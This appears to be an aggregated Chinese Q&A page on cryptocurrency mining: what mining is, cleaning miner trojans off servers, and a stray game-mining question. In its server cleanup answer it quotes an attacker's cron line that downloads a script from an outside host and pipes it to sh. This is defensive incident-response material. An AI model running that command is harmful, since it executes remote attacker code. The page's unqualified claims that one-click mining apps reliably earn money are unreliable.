系統讓我去挖礦

A. 電腦上面說的挖礦是什麼意思

挖礦：即比特幣挖礦，是一種利用電腦硬體計算出比特幣的位置並獲取的過程。

B. 電腦被svchost.exe挖礦怎麼辦

這個svchost.exe是系統程序，所有的系統服務都有依靠它來運行的，根本就不能刪掉的（即使刪了你的系統也就崩潰了），所以需要你檢查控制面板，管理工具，服務，看看服務中有什麼可疑的內容沒有。

C. 我看到網上經常說「挖礦」賺錢， 怎麼挖啊我現在只有電腦和手機，能挖嗎我下崗了，想挖礦試試

洗洗睡吧，把手機和電腦賣了，去路邊炒粉掙錢

D. 電腦上面說的挖礦是什麼意思

挖礦：即比特幣挖礦，是一種利用電腦硬體計算出比特幣的位置並獲取的過程。

E. 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

F. 什麼是挖礦，真的能賺錢嗎，我來告訴你

挖礦是將一段時間內比特幣系統中發生的交易進行確認,並記錄在區塊鏈上形成新區塊的過程,挖礦的人叫做礦工。

挖礦能賺錢嗎？周圍接觸過區塊鏈的人都問過我這個問題。答案肯定是能，不然挖礦也不會作為區塊鏈發展的根基，無數的人去做礦工！

那怎麼挖？小白用戶表示一頭霧水。可以用哈魚礦工挖礦，親身體驗下挖抗，主要是下載軟體，一鍵就能挖礦，沒有任何學習成本！

G. 我網上買了一個重裝系統U盤，重裝系統之後電腦里有一個惡意挖礦軟體，請問把這個卸載了就可以了嗎

直接卸載是不行的，建議「開始」-「運行」，輸入：regedit，打開windows注冊表，點擊上方：「編輯」-「查找」（不要勾選全字匹配，其他都勾上），輸入內容：lovecloud，然後將注冊表中所有與該內容有關的找出，全部刪掉。
你卸載掉該惡意軟體，同時在注冊表中搜不出任何與lovecloud有關的項，才能確定刪除干凈了。

H. 為什麼我去挖礦系統顯示要70級，我已經70級而且學了大師採金

仔細看看 是要求70還是71=。=新出的礦要求是71吧。。。 如果真的是要求70你到70了挖不了，就提交BUG唄。。。

I. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

J. 什麼是挖礦

挖礦就是利用比特幣挖礦機，就是用於賺取比特幣。

用戶用個人計算機下載軟體然後運行特定演算法，與遠方伺服器通訊後可得到相應比特幣，是獲取比特幣的方式之一。

比特幣為一種虛擬的貨幣，比特幣挖礦制度為通過計算機硬體為比特幣網路開展數學運算的過程，提供服務的礦工可以得到一筆報酬，因為網路報酬依據礦工完成的任務來計算，為此挖礦的競爭十分激烈。

挖礦實際是性能的競爭、裝備的競爭，由非常多張顯卡組成的挖礦機，哪怕只是HD6770這種中低端顯卡，「組團」之後的運算能力還是能夠超越大部分用戶的單張顯卡的。

而且這還不是最可怕的，有些挖礦機是更多這樣的顯卡陣列組成的，數十乃至過百的顯卡一起來，顯卡本身也是要錢的，算上硬體價格等各種成本，挖礦存在相當大的支出。

(10)系統讓我去挖礦擴展閱讀：

比特幣挖礦流程：

1、找到礦池

開始挖礦必須要有一個操作方便、產出穩定的礦池，它的作用就是為各個終端細分數據包，可以通過精密的演算法將終端計算好的數據包按照比例，支付相應數量的比特幣。

2、下載比特幣挖礦器（軟體）

其實這種挖礦器也有很多種，大家可以去官方網站下載。

3、設置挖礦軟體

GUIMiner是個綠色軟體，安裝完成後我們可以先設置下語言，以便更方便進一步設置。接下來需要對采礦器設置伺服器、用戶名、密碼、設備等。一般伺服器從BTC guild系列裡面選一個網路較好的就行，用戶名和密碼就是我們之前自己設置的。

4、比特幣挖礦開始

當我們確認都設定無誤後，點「開始挖礦」按鈕之後就開始挖比特幣了，隨之顯卡很快就會進入全速運行狀態，溫度升高、風扇轉速提高，你可以通過GPU-Z或顯卡驅動來監控狀態。